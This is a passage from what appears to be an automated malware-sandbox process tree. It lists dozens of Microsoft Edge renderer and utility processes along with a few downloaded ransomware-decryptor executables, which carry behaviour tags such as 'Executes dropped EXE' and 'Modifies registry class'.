  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
  2⤵
  PID:2836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
  2⤵
  PID:1348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7456 /prefetch:1
  2⤵
  PID:4672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7472 /prefetch:1
  2⤵
  PID:4232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:4752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7836 /prefetch:1
  2⤵
  PID:2432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8000 /prefetch:1
  2⤵
  PID:3524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8224 /prefetch:1
  2⤵
  PID:1564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8236 /prefetch:1
  2⤵
  PID:3748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8380 /prefetch:1
  2⤵
  PID:4516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8500 /prefetch:1
  2⤵
  PID:1556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9068 /prefetch:1
  2⤵
  PID:5032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9056 /prefetch:1
  2⤵
  PID:5128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9252 /prefetch:1
  2⤵
  PID:5136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9228 /prefetch:1
  2⤵
  PID:5144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9592 /prefetch:1
  2⤵
  PID:5280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9912 /prefetch:1
  2⤵
  PID:5352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10104 /prefetch:1
  2⤵
  PID:5604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10112 /prefetch:1
  2⤵
  PID:5612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10140 /prefetch:1
  2⤵
  PID:5620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8976 /prefetch:1
  2⤵
  PID:5236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8372 /prefetch:1
  2⤵
  PID:5880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7280 /prefetch:1
  2⤵
  PID:416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7256 /prefetch:1
  2⤵
  PID:2132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10964 /prefetch:1
  2⤵
  PID:1296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10120 /prefetch:1
  2⤵
  PID:5692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8288 /prefetch:1
  2⤵
  PID:5708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8324 /prefetch:1
  2⤵
  PID:5652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:1
  2⤵
  PID:5828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9764 /prefetch:1
  2⤵
  PID:6104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9888 /prefetch:1
  2⤵
  PID:6120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8060 /prefetch:1
  2⤵
  PID:5160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8020 /prefetch:1
  2⤵
  PID:5744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9104 /prefetch:1
  2⤵
  PID:1800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7544 /prefetch:1
  2⤵
  PID:1148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7532 /prefetch:1
  2⤵
  PID:4664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7520 /prefetch:1
  2⤵
  PID:888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7344 /prefetch:1
  2⤵
  PID:5092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:1
  2⤵
  PID:4928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10532 /prefetch:8
  2⤵
  PID:4580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=11516 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3620
- C:\Users\Admin\Downloads\Emsisoft_Decryptor_for_STOP_Djvu_v1.0.0.5.exe
  "C:\Users\Admin\Downloads\Emsisoft_Decryptor_for_STOP_Djvu_v1.0.0.5.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  PID:5552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
  2⤵
  PID:6964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11428 /prefetch:1
  2⤵
  PID:6652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7692 /prefetch:1
  2⤵
  PID:6240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7680 /prefetch:1
  2⤵
  PID:5212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8924 /prefetch:8
  2⤵
  PID:5984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8632 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6492
- C:\Users\Admin\Downloads\decrypt_WannaCryFake.exe
  "C:\Users\Admin\Downloads\decrypt_WannaCryFake.exe"
  2⤵
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:3416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11016 /prefetch:1
  2⤵
  PID:2420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8348 /prefetch:1
  2⤵
  PID:2388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9020 /prefetch:1
  2⤵
  PID:1524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7812 /prefetch:1
  2⤵
  PID:4976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7612 /prefetch:1
  2⤵
  PID:5100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1
  2⤵
  PID:5464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
  2⤵
  PID:1856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7192 /prefetch:1
  2⤵
  PID:6916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7460 /prefetch:1
  2⤵
  PID:2096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7472 /prefetch:1
  2⤵
  PID:6424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9588 /prefetch:1
  2⤵
  PID:2080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10548 /prefetch:1
  2⤵
  PID:3164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11776 /prefetch:1
  2⤵
  PID:6760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11708 /prefetch:1
  2⤵
  PID:5492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=12284 /prefetch:8
  2⤵
  PID:2836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=111 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:1
  2⤵
  PID:1116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=11524 /prefetch:8
  2⤵
  PID:2052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=11940 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7040 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
